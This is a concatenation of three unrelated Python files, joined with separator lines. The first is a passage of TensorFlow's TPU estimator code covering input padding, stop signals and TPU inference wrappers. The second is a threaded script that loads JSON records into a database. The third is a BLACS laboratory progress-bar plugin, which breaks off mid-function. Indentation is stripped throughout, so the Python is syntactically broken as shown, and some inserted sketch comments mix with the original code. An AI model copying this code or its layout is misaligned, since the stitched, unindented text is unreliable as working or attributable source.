if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = ops.get_default_graph().get_operations()
# Check that there is at least one CrossReplicaSum operation in the graph.
# This should be introduced by using the CrossShardOptimizer wrapper.
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: An object can only be captured once. Please file a bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object was not captured before `get` was called. '
'Please file a bug.')
return self._object
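# Illustrative sketch (not part of the original module): typical use of
# _CapturedObject is to smuggle a Python object out of a function that is only
# ever called inside TF control flow, where return values must be Tensors.
def _captured_object_usage_sketch():
  capture = _CapturedObject()
  def body_fn():
    # Set the object from inside the body function...
    capture.capture({'key': 'some python object'})
    return []
  body_fn()
  # ...and read it back outside the control flow.
  return capture.get()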
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the case where the value returned from input_fn is a `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches to exhaust the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary and `features`, `labels`, and `signals` are three
distinct keys in that dict. This provides a better structure, which
eases the process of decomposing the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the case where the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
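# Illustrative sketch (not part of the original module): after `_map_fn` is
# mapped over the dataset, every element is a dict of the form
#
#   {'features': <features Tensor or dict, padded to batch_size if requested>,
#    'labels': <labels Tensor or dict; present only if input_fn gave labels>,
#    'signals': {'stopping': <bool Tensor of shape [batch_size, 1]>,
#                'padding_mask': <int32 [batch_size]; only if add_padding>}}
#
# which is exactly what `features_and_labels()` and `signals()` above
# decompose.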
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the boolean check of whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# In the non-Tensor case this is used in a SessionRunHook, so we cannot
# modify the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors across all TPU cores and concat them back, it is
# important to ensure the real data is placed before the padded data, i.e.,
# order is preserved. Given that, the sliced padding mask should be all 0's.
# If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is a full batch or part of the stopping signals, we
# do not need to slice; skipping the slice saves time.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
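# Worked example (not part of the original module): the numpy analogue of
# `_PaddingSignals._padding_mask` for real_batch_size=3, missing_count=2,
# batch_size=5. Real rows are marked 0 and padded rows 1, which is what
# `slice_tensor_or_dict` uses to crop outputs back down to the real batch.
def _padding_mask_example_sketch():
  # Produces array([0, 0, 0, 1, 1], dtype=int32).
  return np.concatenate(
      [np.zeros(3, dtype=np.int32), np.ones(2, dtype=np.int32)])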
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use a special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
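# Illustrative sketch (not part of the original module): `_add_item_to_params`
# behaves like plain assignment for dict params and falls back to the HParams
# API otherwise, e.g.
#
#   params = {'learning_rate': 0.1}
#   _add_item_to_params(params, 'batch_size', 128)  # params['batch_size'] = 128
#
# For an HParams object the same call would go through set_hparam/add_hparam.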
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None,
experimental_export_device_assignment=False,
call_context=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
using inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
call_context: an optional TPUContext under which the TPU run configuration
is stored.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params, experimental_export_device_assignment,
call_context)
tensors = call_computation(
features,
computation,
experimental_export_device_assignment=
experimental_export_device_assignment,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
labels,
config,
params,
experimental_export_device_assignment,
call_context=None):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
if experimental_export_device_assignment and call_context:
# Export the device assignment as part of the model. This is useful for
# model parallel use cases where the model relies on the mapping between
# logical and physical devices.
with call_context.with_mode(_INFERENCE_ON_TPU_MODE) as ctx:
device_assignment = ctx.device_assignment
else:
device_assignment = None
if experimental_export_device_assignment:
tensors_on_cpu = tpu.rewrite_for_inference(
tpu_computation, device_assignment=device_assignment)
else:
tensors_on_cpu = tpu.rewrite(
tpu_computation, device_assignment=device_assignment)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call the model_fn once, and it should be inside `computation`
# so that building the graph happens under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes a deep copy with `config` and `params` in case the user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts the computation on the TPU, adds batching around it, and round-robins
the computation between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@batch_ops.batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
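# Illustrative usage sketch (not part of the original module); the names
# `my_tpu_computation` and `feature_tensor` are hypothetical placeholders.
#
#   outputs = inference_on_tpu(
#       my_tpu_computation,
#       inputs_to_tpu=[feature_tensor],
#       num_batch_threads=16,
#       max_batch_size=128,
#       batch_timeout_micros=10000,
#       allowed_batch_sizes=[16, 32, 64, 128])
#
# Requests are batched up to max_batch_size (padded to one of
# allowed_batch_sizes), dispatched to a TPU core via TPUPartitionedCall, and
# the results are unbatched back to the individual callers.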
|
load_addresses.py
|
import json
import sys
sys.path.append('/Users/xxx0624/SWArch/5200_flask_app/app')
from db_functions import *
import threading
import logging
logger = logging.getLogger('5200_flask_app')
hdlr = logging.FileHandler('/var/tmp/5200_flask_app.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.WARNING)
def process(items, start, end):
for index in range(start, min(end, len(items))):
print(index)
item = items[index]
try:
create(item)
except Exception:
print('error with item:', index)
# index is an int and item may not be a string, so format them rather
# than concatenating (the original `index + item` raises a TypeError).
logger.error('error with item %s: %s', index, item)
if __name__ == '__main__':
file_path = sys.argv[1]
all_data = None
with open(file_path) as f:
all_data = json.load(f)
threads = []
threads_num = 50
# Use ceiling integer division so the chunk boundaries are exact integers.
per_share_size = (len(all_data) + threads_num - 1) // threads_num
start_index = 0
while start_index < len(all_data):
end_index = min(start_index + per_share_size, len(all_data))
threads.append(threading.Thread(
target=process, args=(all_data, start_index, end_index)))
threads[-1].start()  # start the thread we just created
start_index = end_index
# wait for all threads to finish
for t in threads:
t.join()
print('done')
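# Illustrative alternative (not part of the original script): the same fan-out
# can be written with concurrent.futures, which handles the chunking and
# joining for us; `create` is the same db_functions helper used above.
#
#   from concurrent.futures import ThreadPoolExecutor
#   with ThreadPoolExecutor(max_workers=threads_num) as pool:
#       list(pool.map(create, all_data))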
|
__init__.py
|
#####################################################################
# #
# /plugins/progress_bar/__init__.py #
# #
# Copyright 2018, Christopher Billington #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
from Queue import Queue, Empty
else:
from queue import Queue, Empty
import logging
import os
import subprocess
import threading
import sys
import time
import numpy as np
from qtutils import UiLoader, inmain, inmain_decorator
from qtutils.qt import QtGui, QtWidgets, QtCore
import labscript_utils.h5_lock
import h5py
import labscript_utils.properties as properties
from labscript_utils.connections import ConnectionTable
from zprocess import Event, TimeoutError
from blacs.plugins import PLUGINS_DIR, callback
name = "Progress Bar"
module = "progress_bar" # should be folder name
logger = logging.getLogger('BLACS.plugin.%s'%module)
# The progress bar will update every UPDATE_INTERVAL seconds, or at the marker
# times, whichever is soonest after the last update:
UPDATE_INTERVAL = 0.02
BAR_MAX = 1000
def _ensure_str(s):
"""convert bytestrings and numpy strings to python strings"""
return s.decode() if isinstance(s, bytes) else str(s)
def black_has_good_contrast(r, g, b):
"""Return whether black text or white text would have better contrast on a
background of the given colour, according to W3C recommendations (see
https://www.w3.org/TR/WCAG20/). Return True for black or False for
white"""
cs = []
for c in r, g, b:
c = c / 255.0
if c <= 0.03928:
c = c/12.92
else:
c = ((c+0.055)/1.055) ** 2.4
cs.append(c)
r, g, b = cs
L = 0.2126 * r + 0.7152 * g + 0.0722 * b
return L > np.sqrt(1.05 * 0.05) - 0.05
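# Worked example (not part of the original plugin): for pure blue (0, 0, 255)
# the relative luminance is 0.0722, below the threshold of roughly 0.179, so
# the function returns False and white text is used; for pure red (255, 0, 0)
# the luminance is 0.2126 and black text wins.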
class Plugin(object):
def __init__(self, initial_settings):
self.menu = None
self.notifications = {}
self.initial_settings = initial_settings
self.BLACS = None
self.command_queue = Queue()
self.master_pseudoclock = None
self.shot_start_time = None
self.stop_time = None
self.markers = None
self.waits = None
self.time_spent_waiting = None
self.next_wait_index = None
self.next_marker_index = None
self.bar_text_prefix = None
self.h5_filepath = None
self.wait_completed_events_supported = False
self.wait_completed = Event('wait_completed', type='wait')
self.mainloop_thread = threading.Thread(target=self.mainloop)
self.mainloop_thread.daemon = True
self.mainloop_thread.start()
def plugin_setup_complete(self, BLACS):
self.BLACS = BLACS
self.ui = UiLoader().load(os.path.join(PLUGINS_DIR, module, 'controls.ui'))
self.bar = self.ui.bar
self.style = QtWidgets.QStyleFactory.create('Fusion')
if self.style is None:
# If we're on Qt4, fall back to Plastique style:
self.style = QtWidgets.QStyleFactory.create('Plastique')
if self.style is None:
# Not sure what's up, but fall back to app's default style:
self.style = QtWidgets.QApplication.style()
self.bar.setStyle(self.style)
self.bar.setMaximum(BAR_MAX)
self.bar.setAlignment(QtCore.Qt.AlignCenter)
# Add our controls to the BLACS gui:
BLACS['ui'].queue_status_verticalLayout.insertWidget(0, self.ui)
# We need to know the name of the master pseudoclock so we can look up
# the duration of each shot:
self.master_pseudoclock = self.BLACS['experiment_queue'].master_pseudoclock
# Check if the wait monitor device, if any, supports wait completed events:
with h5py.File(self.BLACS['connection_table_h5file'], 'r') as f:
if 'waits' in f:
acq_device = f['waits'].attrs['wait_monitor_acquisition_device']
acq_device = _ensure_str(acq_device)
if acq_device:
props = properties.get(f, acq_device, 'connection_table_properties')
if props.get('wait_monitor_supports_wait_completed_events', False):
self.wait_completed_events_supported = True
self.ui.wait_warning.hide()
def get_save_data(self):
return {}
def get_callbacks(self):
return {'science_over': self.on_science_over,
'science_starting': self.on_science_starting}
@callback(priority=100)
def on_science_starting(self, h5_filepath):
# Tell the mainloop that we're starting a shot:
self.command_queue.put(('start', h5_filepath))
@callback(priority=5)
def on_science_over(self, h5_filepath):
# Tell the mainloop we're done with this shot:
self.command_queue.put(('stop', None))
@inmain_decorator(True)
def clear_bar(self):
self.bar.setEnabled(False)
self.bar.setFormat('No shot running')
self.bar.setValue(0)
self.bar.setPalette(self.style.standardPalette())
self.ui.wait_warning.hide()
def get_next_thing(self):
"""Figure out what's going to happen next: a wait, a time marker, or a
regular update. Return a string saying which, and a float saying how
long from now it will occur. If the thing has already happened but not
been taken into account by our processing yet, then return zero for
the time."""
if self.waits is not None and self.next_wait_index < len(self.waits):
next_wait_time = self.waits['time'][self.next_wait_index]
else:
next_wait_time = np.inf
if self.markers is not None and self.next_marker_index < len(self.markers):
next_marker_time = self.markers['time'][self.next_marker_index]
else:
next_marker_time = np.inf
assert self.shot_start_time is not None
assert self.time_spent_waiting is not None
labscript_time = time.time() - self.shot_start_time - self.time_spent_waiting
next_update_time = labscript_time + UPDATE_INTERVAL
if next_update_time < next_wait_time and next_update_time < next_marker_time:
return 'update', UPDATE_INTERVAL
elif next_wait_time < next_marker_time:
return 'wait', max(0, next_wait_time - labscript_time)
else:
return 'marker', max(0, next_marker_time - labscript_time)
@inmain_decorator(True)
def update_bar_style(self, marker=False, wait=False, previous=False):
"""Update the bar's style to reflect the next marker or wait,
according to self.next_marker_index or self.next_wait_index. If
previous=True, instead update to reflect the current marker or
wait."""
assert not (marker and wait)
# Ignore requests to reflect markers or waits if there are no markers
# or waits in this shot:
marker = marker and self.markers is not None and len(self.markers) > 0
wait = wait and self.waits is not None and len(self.waits) > 0
if marker:
marker_index = self.next_marker_index
if previous:
marker_index -= 1
assert marker_index >= 0
label, _, color = self.markers[marker_index]
self.bar_text_prefix = '[%s] ' % _ensure_str(label)
r, g, b = color[0]
# Black is the default colour in labscript.add_time_marker.
# Don't change the bar colour if the marker colour is black.
if (r, g, b) != (0,0,0):
bar_color = QtGui.QColor(r, g, b)
if black_has_good_contrast(r, g, b):
highlight_text_color = QtCore.Qt.black
else:
highlight_text_color = QtCore.Qt.white
else:
bar_color = None
highlight_text_color = None
regular_text_color = None # use default
elif wait:
wait_index = self.next_wait_index
if previous:
wait_index -= 1
assert wait_index >= 0
label = self.waits[wait_index]['label']
self.bar_text_prefix = '-%s- ' % _ensure_str(label)
highlight_text_color = regular_text_color = QtGui.QColor(192, 0, 0)
bar_color = QtCore.Qt.gray
if marker or wait:
palette = QtGui.QPalette()
if bar_color is not None:
palette.setColor(QtGui.QPalette.Highlight, bar_color)
# Ensure the colour of the text on the filled in bit of the progress
# bar has good contrast:
if highlight_text_color is not None:
palette.setColor(QtGui.QPalette.HighlightedText, highlight_text_color)
if regular_text_color is not None:
palette.setColor(QtGui.QPalette.Text, regular_text_color)
self.bar.setPalette(palette)
else:
self.bar_text_prefix = None
# Default palette:
